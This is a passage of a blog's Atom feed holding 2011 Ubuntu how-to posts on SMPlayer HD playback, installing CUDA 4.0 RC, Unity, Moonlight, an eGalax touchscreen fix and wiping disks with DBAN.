sudo apt-get upgrade&lt;br /&gt;
sudo apt-get install smplayer&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 - SMPlayer configuration :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(A) Open the SMplayer.  Select "Option" -- "Preference".&lt;br /&gt;
&lt;br /&gt;
Go to "General" on the left hand side :&lt;br /&gt;
&lt;br /&gt;
(1) If you have an nVidia display card :&lt;br /&gt;
"General" -- "Video" -- "Output driver" : vdpau&lt;br /&gt;
&lt;br /&gt;
(2) If you have an ATi/AMD Radeon display card :&lt;br /&gt;
"General" -- "Video" -- "Output driver" : xv (0 - ATI Radeon AVIVO video)&lt;br /&gt;
&lt;br /&gt;
(B) Go to "Performance" on the left hand side :&lt;br /&gt;
"Performance" -- "Cache" -- "Local" : 99999 kb&lt;br /&gt;
"Performance" -- "Cache" -- "Streaming" : 99999 kb&lt;br /&gt;
&lt;br /&gt;
"Performance" -- "Performance" -- "Allow hard frame drop (can lead to image distortion)" : Enable&lt;br /&gt;
"Performance" -- "Performance" -- "H.264" -- select "loop filter (only skip on HD moive)"&lt;br /&gt;
&lt;br /&gt;
If you have dual core CPU -&lt;br /&gt;
"Performance" -- "Performance" -- "Decoding thread (only MEG-1/2 and H.264)" : 2&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Lenovo ThinkPad X100e, which is equipped with ATi Radeon HD3200 and AMD Athlon Neo MV-40 single processor, can playback HD movies (such as MKV) smoothly.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-571621514976982527?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/571621514976982527'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/571621514976982527'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-hd-video-playback-on-ubuntu-1104.html' title='HOWTO : HD video playback on Ubuntu 11.04 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-571171113984610129</id><published>2011-05-03T16:49:00.000+08:00</published><updated>2011-05-03T16:49:35.901+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Server</title><content type='html'>If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 11.04 Server.&lt;br /&gt;
&lt;br /&gt;
You will experience a faster server after the installation of CUDA 4.0. &lt;br /&gt;
&lt;br /&gt;
This HOWTO does not require to install X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following lines.&lt;br /&gt;
&lt;br /&gt;
============= Copy from here ================&lt;br /&gt;
&lt;code&gt;#!/bin/bash&lt;br /&gt;
&lt;br /&gt;
PATH=/sbin:/bin:/usr/bin:$PATH&lt;br /&gt;
&lt;br /&gt;
/sbin/modprobe nvidia&lt;br /&gt;
&lt;br /&gt;
if [ "$?" -eq 0 ]; then&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;# Count the number of NVIDIA controllers found.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N=`expr $N3D + $NVGA - 1`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;for i in `seq 0 $N`; do&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidia$i c 195 $i;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;done&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidiactl c 195 255&lt;br /&gt;
&lt;br /&gt;
else&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;exit 1&lt;br /&gt;
fi &lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
=========== Copy to here =================&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod +x /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo update-rc.d nvidia_cuda defaults&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I do not have nVidia display cards server in hand at the moment, I am not sure the captioned startup script working properly or not.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-571171113984610129?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/571171113984610129'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/571171113984610129'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-nvidia-cuda-40-rc-on-ubuntu-1104_03.html' title='HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Server'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2295370372178861719</id><published>2011-05-03T16:47:00.004+08:00</published><updated>2011-05-04T00:33:00.652+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Desktop</title><content type='html'>If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 11.04 Desktop.&lt;br /&gt;
&lt;br /&gt;
You will experience a faster desktop after the installation of CUDA 4.0. Meanwhile, if you installed SMPlayer, you can playback 1080p videos with the help of vdpau.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you do not have any nVidia driver installed before, you need to do the following command.  Otherwise, this step is not required at all.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nvidia-xconfig&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To install SMPlayer.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install smplayer smplayer-translations smplayer-themes&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then set it to use "&lt;code&gt;vdpau&lt;/code&gt;" at "&lt;code&gt;Output Driver&lt;/code&gt;" at "&lt;code&gt;Preference&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Known issue&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Sample codes cannot be compiled successful due to newer C compiler.  However, you can download the &lt;a href="http://samiux.volospin.com/download/CUDA_4.0_samples_x64.tar.gz"&gt;sample programs&lt;/a&gt; which are compiled with C compiler of Ubuntu 10.10.  The compiled sample programs are in 64-bit.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install freeglut3-dev libxi-dev libXmu-dev&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvzf CUDA_4.0_samples_x64.tar.gz&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;cd CUDA_4.0_samples_x64&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;./nbody&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2295370372178861719?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2295370372178861719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2295370372178861719'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-nvidia-cuda-40-rc-on-ubuntu-1104.html' title='HOWTO : nVidia CUDA 4.0 RC on Ubuntu 11.04 Desktop'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-3764241449780680902</id><published>2011-05-02T22:03:00.004+08:00</published><updated>2011-05-16T11:52:09.829+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Unity'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>Hints on installation of Ubuntu 11.04</title><content type='html'>Ubuntu 11.04 comes with a new theme namely Unity.  It is a 3D theme that requires 3D display driver.&lt;br /&gt;
&lt;br /&gt;
If you have an nVidia or ATi/AMD display cards, you should install the display driver after the installation of Ubuntu 11.04.  Otherwise, you will be in Classic interface instead of Unity.&lt;br /&gt;
&lt;br /&gt;
Or, may be you can install the 2D Unity instead.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get install unity-2d&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Furthermore, the 3D Unity will be installed automatically on Intel display card system.&lt;br /&gt;
&lt;br /&gt;
In addition, if you are going to install Ubuntu 11.04 on a laptop or netbook, you should plug in the power cable; otherwise, your interface after the installation will be in a mess.&lt;br /&gt;
&lt;br /&gt;
If you considered to upgrade from 10.10, I recommended to fresh install as some previous settings of Gnome may affect to the new interface - Unity as well as Firefox 4.  Before fresh install, please backup all your data.&lt;br /&gt;
&lt;br /&gt;
By the way, if you encounter the blank screen or black screen on Intel display card system, you can refer to this &lt;a href="http://samiux.blogspot.com/2011/05/howto-blank-screen-when-boot-up-ubuntu.html"&gt;tutorial&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The following is the video which shows you how to operate with the Unity on my remastered Ubuntu Samiux Remix :&lt;br /&gt;
&lt;br /&gt;
&lt;iframe width="425" height="349" src="http://www.youtube.com/embed/VIg1LgdID_o" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-3764241449780680902?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3764241449780680902'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/3764241449780680902'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/hints-on-installation-of-ubuntu-1104.html' title='Hints on installation of Ubuntu 11.04'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/VIg1LgdID_o/default.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4415699613308505355</id><published>2011-05-02T17:31:00.002+08:00</published><updated>2011-07-16T18:05:39.074+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Silverlight'/><category scheme='http://www.blogger.com/atom/ns#' term='Moonlight'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : Moonlight on Ubuntu 11.04</title><content type='html'>Moonlight is a clone of Microsoft Silverlight for Linux.  Ubuntu 11.04 has it in the repository.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;br /&gt;
sudo apt-get install libmoon moonlight-plugin-mozilla moonlight-plugin-core&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official Mono site to download and install the addon for Firefox.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.go-mono.com/moonlight/"&gt;Mono site&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to &lt;a href="http://www.hkjc.com"&gt;Hong Kong Jockey Club website&lt;/a&gt; to test the result of the installation.  You may required to install Microsoft Video Media Codec.  Just do so to install.&lt;br /&gt;
&lt;br /&gt;
After that, restart your Firefox to make the addon works.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
When the Firefox is updated to 5.0, the Moonlight is not supported.  However, you can download "Add-on Compatibility Reporter" to overcome this problem.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/add-on-compatibility-reporter/"&gt;Add-on Compatibility Reporter&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4415699613308505355?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4415699613308505355'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4415699613308505355'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-moonlight-on-ubuntu-1104.html' title='HOWTO : Moonlight on Ubuntu 11.04'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-7850952257718304872</id><published>2011-04-30T20:23:00.001+08:00</published><updated>2011-04-30T21:44:43.170+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='eGalax'/><category scheme='http://www.blogger.com/atom/ns#' term='Gigabyte T1028X'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><category scheme='http://www.blogger.com/atom/ns#' term='Gigabyte M1028'/><title type='text'>HOWTO : Ubuntu 11.04 on Gigabyte TouchNote T1028X/M1028</title><content type='html'>Gigabyte TouchNote T1028X/M1028 equipped with Intel Atom N280 and eGalax touch screen.  It runs Ubuntu 11.04 flawlessly except touchpad.  This tutorial is telling you how to overcome this problem.&lt;br /&gt;
&lt;br /&gt;
"&lt;code&gt;lsusb&lt;/code&gt;" shows the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Boot up the system and press "&lt;code&gt;Ctrl+Alt+t&lt;/code&gt;" to open a terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/default/grub&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append "&lt;code&gt;i8042.noloop=1&lt;/code&gt;" to "&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
It will look like this :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Save and exit.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo update-grub&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/modprobe.d/blacklist.conf&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following to the file.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;blacklist usbtouchscreen&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7850952257718304872?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7850952257718304872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7850952257718304872'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-ubuntu-1104-on-gigabyte-touchnote.html' title='HOWTO : Ubuntu 11.04 on Gigabyte TouchNote T1028X/M1028'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4946668070292713665</id><published>2011-04-27T03:59:00.001+08:00</published><updated>2011-04-27T04:00:55.303+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='UNetBootin'/><category scheme='http://www.blogger.com/atom/ns#' term='DBAN'/><title type='text'>HOWTO : Wipe hard drive safety and completely</title><content type='html'>&lt;a href="http://www.dban.org/"&gt;Darik's Boot and Nuke (DBAN)&lt;/a&gt; is a self-contained boot disk that securely wipes the hard disks of most computers. DBAN will automatically and completely delete the contents of any hard disk that it can detect, which makes it an appropriate utility for bulk or emergency data destruction.&lt;br /&gt;
&lt;br /&gt;
There are some wipe methods, they are Quick Erase, RCMP TSSIT OPS-II, DoD Short, DoD 520.22-M, Gutmann Wipe and PRNG Stream.  Where DoD is The American Department of Defense.  The default is The American Department of Defense 5220.22-M short wipe (DoD Short).&lt;br /&gt;
&lt;br /&gt;
It is a very easy to use utility.  A 300GB hard drive will take about 2 or 3 hours to wipe with the DoD Short method.  The hard drive after the wipe is like a brand new one.&lt;br /&gt;
&lt;br /&gt;
You can download it at &lt;a href="http://www.dban.org/download"&gt;here&lt;/a&gt;.  Then, burn it in a CD-ROM or create a bootable USB stick with &lt;a href="http://unetbootin.sourceforge.net/"&gt;UNetBootin&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4946668070292713665?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4946668070292713665'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4946668070292713665'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/04/howto-wipe-hard-drive-safety-and.html' title='HOWTO : Wipe hard drive safety and completely'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2524887022439226620</id><published>2011-04-24T14:34:00.007+08:00</published><updated>2011-04-25T12:55:43.230+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='nVidia'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>HOWTO : nVidia CUDA 4.0 RC on Ubuntu 10.10 Server</title><content type='html'>If you have nVidia display card that have several CUDAs on it, you will interested in this tutorial. This time, I would like to show you how to install CUDA 4.0 RC on Ubuntu 10.10 Server.&lt;br /&gt;
&lt;br /&gt;
You will experience a faster server after the installation of CUDA 4.0. &lt;br /&gt;
&lt;br /&gt;
This HOWTO does not require to install X.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Add the CUDA 4.0 PPA.&lt;br /&gt;
&lt;code&gt;sudo add-apt-repository ppa:aaron-haviland/cuda-4.0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo apt-get update&lt;br /&gt;
sudo apt-get upgrade&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;64-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler libnpp4 nvidia-cuda-doc nvidia-current-modaliases libcudart4 libcublas4 libcufft4 libcusparse4 libcurand4 nvidia-current nvidia-opencl-dev  nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;32-bit :&lt;/u&gt;&lt;br /&gt;
&lt;code&gt;sudo apt-get install nvidia-cuda-gdb nvidia-cuda-toolkit nvidia-compute-profiler lib32npp4 nvidia-cuda-doc nvidia-current-modaliases lib32cudart4 lib32cublas4 lib32cufft4 lib32cusparse4 lib32curand4 nvidia-current nvidia-opencl-dev nvidia-current-dev nvidia-cuda-dev nvidia-kernel-common opencl-headers&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo nano /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Append the following lines.&lt;br /&gt;
&lt;br /&gt;
============= Copy from here ================&lt;br /&gt;
&lt;code&gt;#!/bin/bash&lt;br /&gt;
&lt;br /&gt;
PATH=/sbin:/bin:/usr/bin:$PATH&lt;br /&gt;
&lt;br /&gt;
/sbin/modprobe nvidia&lt;br /&gt;
&lt;br /&gt;
if [ "$?" -eq 0 ]; then&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;# Count the number of NVIDIA controllers found.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N3D=`/usr/bin/lspci | grep -i NVIDIA | grep "3D controller" | wc -l`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;NVGA=`/usr/bin/lspci | grep -i NVIDIA | grep "VGA compatible controller" | wc -l`&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;N=`expr $N3D + $NVGA - 1`&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;for i in `seq 0 $N`; do&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidia$i c 195 $i;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;done&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;/bin/mknod -m 666 /dev/nvidiactl c 195 255&lt;br /&gt;
&lt;br /&gt;
else&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;exit 1&lt;br /&gt;
fi &lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
=========== Copy to here =================&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;sudo chmod +x /etc/init.d/nvidia_cuda&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;sudo update-rc.d nvidia_cuda defaults&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Reboot your system.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I do not have nVidia display cards server in hand at the moment, I am not sure the captioned startup script working properly or not.&lt;br /&gt;
&lt;br /&gt;
